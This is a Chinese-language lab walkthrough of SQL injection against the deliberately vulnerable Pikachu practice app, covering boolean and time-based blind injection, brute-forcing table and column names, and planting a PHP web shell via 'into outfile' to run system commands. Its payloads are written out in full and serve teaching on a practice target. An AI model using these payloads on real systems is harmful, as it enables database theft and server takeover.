pikachu注入漏洞演示3

sql-inject 漏洞-盲注
盲注:
pikachu注入漏洞演示3_第1张图片
基于真假的盲注
pikachu注入漏洞演示3_第2张图片
先用字符串测试一下
pikachu注入漏洞演示3_第3张图片

发现不行
pikachu注入漏洞演示3_第4张图片
再试试
pikachu注入漏洞演示3_第5张图片
pikachu注入漏洞演示3_第6张图片
因为kobe存在,and 1=1为真 所以被写入后台,所以存在sql注入
用之前基于报错的payload来试一下
kobe’ and extractvalue(0,concat(0x7e,version()))#
不行

pikachu注入漏洞演示3_第7张图片
pikachu注入漏洞演示3_第8张图片

获取数据库名称,取第一个字符转成ascii码,转成ascii码之后就可以对他进行运算

pikachu注入漏洞演示3_第9张图片
pikachu注入漏洞演示3_第10张图片
要转换成真和假,因为 在基于真假的sql注入里面,所有从前段看到的只有两种情况,要么是真,要么是假,所以payload传到后台的时候得出来的结果一定要是真或假两种情况,从前段才可以做对的判断,否则做不了判断。
看我们传进去的database的payload对应的结果返回的数据库长度是多少 是7个字符
pikachu注入漏洞演示3_第11张图片
kobe’ and ascii(substr(database(),1,1))>113#

如果返回了kobe对应的信息,意味着and后面的表达式为真,反之为假。基于真假就能知道database第一个字符串是不是>113。
提示不存在
pikachu注入漏洞演示3_第12张图片

改一下
kobe’ and ascii(substr(database(),1,1))=112#
显示出来了kobe的信息
pikachu注入漏洞演示3_第13张图片

(select table_name from information_schema.tables where table_schema=database() limit 0,1) 把这个payload替换database

kobe’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<112#

返回皮卡丘当前数据库第一个表的名称

pikachu注入漏洞演示3_第14张图片

盲注-base on time 的盲注案例演示
pikachu注入漏洞演示3_第15张图片

用暂停5秒试一下
kobe’ and sleep(5)#
把我们输入的payload执行了,说明这块存在sql注入,并且是基于时间的盲注pikachu注入漏洞演示3_第16张图片

根据时间的延迟来做判断
用 if 做判断,通过 database 把数据库名称取出来,通过 substr 把数据库第一个字符取出来,和 p 作比较,如果等于p 则暂停5秒钟。

kobe’ and if((substr(databese(),1,1))=‘p’,sleep(5),null)#

通过sql 进行服务器的远程控制案例测试
pikachu注入漏洞演示3_第17张图片

pikachu注入漏洞演示3_第18张图片

pikachu注入漏洞演示3_第19张图片
一句话木马写到select字段里面,

outfile:把select出来的两个字段写到后面指定的文件中去。

kobe’ union select “”,2 into outfile “/var/www/html/1.php”#

执行访问一下 传一个phpinfo() 赋值给text 最终被eval执行
通过链接可以执行任意php代码

pikachu注入漏洞演示3_第20张图片

看一下远程操作系统命令执行
system是php下用来执行操作系统的函数
kobe’ union select “”,2 into outfile “/var/www/html/2.php”#

会把当前目录相关的文件列出来
在这里插入图片描述

得到 IP地址和服务器
pikachu注入漏洞演示3_第21张图片
暴力破解在sql漏洞中的应用

kobe’ and exists(select * from aa)#
aa是我们猜测的部分 aa是一个字典
试一下
pikachu注入漏洞演示3_第22张图片
把抓到的包发送到intruder
把其他的都clear掉 只add aa
pikachu注入漏洞演示3_第23张图片

写几个payload试一下
pikachu注入漏洞演示3_第24张图片

pikachu注入漏洞演示3_第25张图片

猜出数据库表的名字
pikachu注入漏洞演示3_第26张图片

下面猜列的名字
kobe’ and exists(select id from users)#

试一下

pikachu注入漏洞演示3_第27张图片

把数据包抓下来 发送到 intruder 对id 字段进行爆破
pikachu注入漏洞演示3_第28张图片

pikachu注入漏洞演示3_第29张图片

你可能感兴趣的:(pikachu注入漏洞演示3)